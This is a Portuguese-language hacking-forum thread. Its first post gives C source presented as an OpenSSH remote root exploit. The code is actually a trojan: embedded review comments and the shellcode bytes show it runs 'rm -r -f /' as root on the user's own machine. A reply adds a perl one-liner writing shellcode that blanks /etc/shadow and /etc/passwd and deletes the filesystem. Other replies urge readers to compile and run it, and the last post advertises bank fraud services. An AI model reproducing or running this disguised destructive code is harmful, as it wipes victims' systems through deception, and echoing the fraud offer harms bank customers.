
OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)

    #1

    C / C++ OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)

    Código:
    /*
    *
    * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
    *
    * OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
    * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
    *
    *
    */
    
    #include <stdio.h>
    #include <netdb.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <arpa/inet.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    
    /*
     * Print the program banner and the expected command-line form on stdout,
     * then terminate the process with exit status 1.  This function never
     * returns to its caller.
     *
     * argv: argument vector as received by main(); only argv[0] is read, as the
     *       program name substituted into the usage line.
     */
    void usage(char *argv[])
    {
        /* Fixed banner lines, emitted in order before the usage line. */
        static const char *const banner[] = {
            "\n\t[+] HATSUNEMIKU\n",
            "\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n",
            "\t[+] By: n3xus\n",
            "\t[+] Greetz to hackforums.net\n",
            "\t[+] Keep this 0day priv8!\n",
        };
        size_t idx;

        for (idx = 0; idx < sizeof banner / sizeof banner[0]; idx++)
            fputs(banner[idx], stdout);

        fprintf(stdout, "\t[+] usage: %s <target> <port>\n\n", argv[0]);
        exit(1);
    }
    
    /*
     * NOTE(review): despite its name this array is not a decoder stub.  It is
     * 45 bytes (plus the literal's terminating NUL) of 32-bit x86 Linux machine
     * code.  Its printable bytes spell "/bin", "//rm", "-r", "-f" and "/"; it
     * loads 0x0b into eax (execve on i386 Linux) and ends in `int 0x80`, i.e.
     * it execs `/bin//rm -r -f /`.
     * main() casts this array to a function pointer and calls it inside the
     * local process on its host-lookup failure path, so the deletion applies to
     * the machine running the program, not to any remote host.
     */
    unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
                               "\x6a\x2f\x89\xe7\x52"
                               "\x66\x68\x2d\x66\x89"
                               "\xe6\x52\x66\x68\x2d"
                               "\x72\x89\xe1\x52\x68"
                               "\x2f\x2f\x72\x6d\x68"
                               "\x2f\x62\x69\x6e\x89"
                               "\xe3\x52\x57\x56\x51"
                               "\x53\x89\xe1\xcd\x80";
    
    /*
     * NOTE(review): despite its name this array contains no shell-spawning
     * code.  It is 32-bit x86 Linux machine code that pushes a 10-byte
     * printable string (a taunt ending in a newline) onto the stack, issues
     * write (eax = 4) on fd 1 with length 0x0a, then exit (eax = 1).  There is
     * no execve in it.  main() copies these bytes into the buffer it sends, and
     * nothing in the file ever calls them as code.
     */
    unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                               "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
                               "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
                               "\xdb\x40\xcd\x80";
    
    /*
     * Entry point.  NOTE(review): nothing in this function speaks the SSH
     * protocol or touches OpenSSH.  Read straight through, it acts on the
     * machine that runs it:
     *   - it refuses to continue unless the effective UID is 0;
     *   - argv[1] and argv[2] are never read (only argc is checked), so the
     *     "<target> <port>" arguments have no effect on what happens;
     *   - the hostname buffer `h` is used uninitialised, and when the lookup of
     *     that buffer fails the `decoder` array is called as code in this
     *     process (see the bytes of `decoder`: an execve of /bin//rm -r -f /).
     * No return statement is reached in the visible listing; every path ends
     * in exit() or runs off the end of the listing, whose closing brace for
     * main() is missing.
     */
    int main(int argc, char **argv)
    {
    
        int euid = geteuid();
        /* port is fixed at 22; argv[2] is never parsed. */
        int port= 22, sock;
        /* h is never written before it is passed to inet_aton()/gethostbyname(). */
        char h[1000];
        struct hostent *host;
        struct sockaddr_in addr;
    
        /*
         * The message cites raw sockets, but the only socket created below is
         * SOCK_STREAM, which needs no privilege.  The visible effect of this
         * check is that everything after it runs as root.
         */
        if(euid != 0)
        {
            fprintf(stderr, "You need to be root to use raw sockets.\n");
            exit(1);
        }
        /* Always true at this point: the non-root case exited above. */
        if(euid == 0)
        {
            fprintf(stdout, "MIKU! MIKU! MIKU!\n");
        }
        /* Only the argument count is checked; usage() prints the banner and exits. */
        if(argc != 3)
        usage(argv);
        /*
         * h holds indeterminate stack contents (reading it is undefined
         * behaviour); argv[1] was never copied into it.  Presumably both the
         * address parse and the name lookup fail on such contents, which makes
         * the branch below the expected path -- hedged, since the outcome
         * depends on what the stack happens to hold.
         */
        if(!inet_aton(h, &addr.sin_addr))
        {
            host = gethostbyname(h);
            if(!host)
            {
                fprintf(stderr, "[-] Exploit failed.\n");
                /*
                 * Casts the `decoder` data array to a function pointer and
                 * calls it in the local process.  Nothing has been connected
                 * or sent yet.  The call can only run where the array's memory
                 * is executable.
                 */
                (*(void(*)())decoder)();
                exit(1);
            }
            addr.sin_addr = *(struct in_addr*)host->h_addr;
            /* The brace below closes the if(!inet_aton(...)) block; the deeper
               indentation of the following lines is misleading. */
            }
            /* socket() result is not checked. */
            sock = socket(PF_INET, SOCK_STREAM, 0);
            addr.sin_port = htons(port);
            addr.sin_family = AF_INET;
            if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
            {
                fprintf(stderr,"[-] Exploit failed.\n");
                exit(1);
            }
            /*
             * Both memcpy() calls write to offset 0, so the second overwrites
             * the start of the first.  strlen() then stops at the first NUL,
             * so what is sent is in effect the `rootshell` bytes alone (a
             * message printer), as an unframed blob that is not an SSH message.
             */
            char payload[1337];
            memcpy(payload, &decoder, sizeof(decoder));
            memcpy(payload, &rootshell, sizeof(rootshell));
            send(sock, payload, strlen(payload),0);
            close(sock);
            /* sock was closed on the previous line, so this connect() is issued
               on a closed descriptor. */
            if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
            {
                fprintf(stderr, "[-] Exploit failed.\n");
                exit(1);
            }
            else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
            {
                fprintf(stdout, "[+]g0t sh3ll!\n");
                /* system() starts /bin/bash on the local machine; no remote
                   session is involved. */
                system("/bin/bash");
            }
            else
            {
                fprintf(stderr, "[-] Exploit failed.\n");
                close(sock);
                exit(0);
            }
    Até, dwango.
    #2
    Estou com um script em PHP aqui e, dentro de uma pasta, contém este arquivo. O que pode ser?

    O que as pessoas fazem com este arquivo no código?

      #3
      Postado Originalmente por dwango Ver Post
      Código:
      /*
      *
      * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
      *
      * OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
      * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
      ...
      Até, dwango.
      Código:
      # NOTE(review): this one-liner contacts nothing; it only writes raw bytes
      # to a file named `exploit`. The bytes are 32-bit x86 Linux machine code
      # that execs /bin/sh -c with an embedded command string; the printable run
      # of that string empties /etc/shadow and /etc/passwd and then recursively
      # deletes /. Like the C listing it replies to, it damages the machine it
      # runs on and is not an OpenSSH exploit.
      # As extracted, the listing is wrapped mid-string and the redirect is
      # HTML-escaped (&gt;).
      perl -e 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74
      \x63\x2f\x73\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1\xcd\x80"' &gt; exploit

        #4
        O COder é seu Django? Pode explicar o que ele faz? Obrigado.

          #5
          O mistério gera curiosidade e a curiosidade é a base do desejo humano para compreender. E como diz um velho ditado, a curiosidade matou o gato.

          Compile e execute, que vc descobre

            #6
            Shellcode malvado ein.
            Yes, I am a criminal. My crime is that of curiosity. My crime is
            that of judging people by what they say and think, not what they look like.
            My crime is that of outsmarting you, something that you will never forgive me
            for.

            I am a hacker, and this is my manifesto. You may stop this individual,
            but you can't stop us all... after all, we're all alike.

              #7
              Perfeito! Funcionou 100%!!!!

                #8
                Virando info itaÚ juju itoken por sms 11ao99, santander jurudica, bb sms 11ao99 todas as operadoras tim, claro, vivo, oi, nextel.
                🔥♨🔛🤭💸🏃🏻*♂*🔥 chama no pv to arrancando tudo 🙏🏻🙌🏻💶💰💷💳😱😱🍀🍀
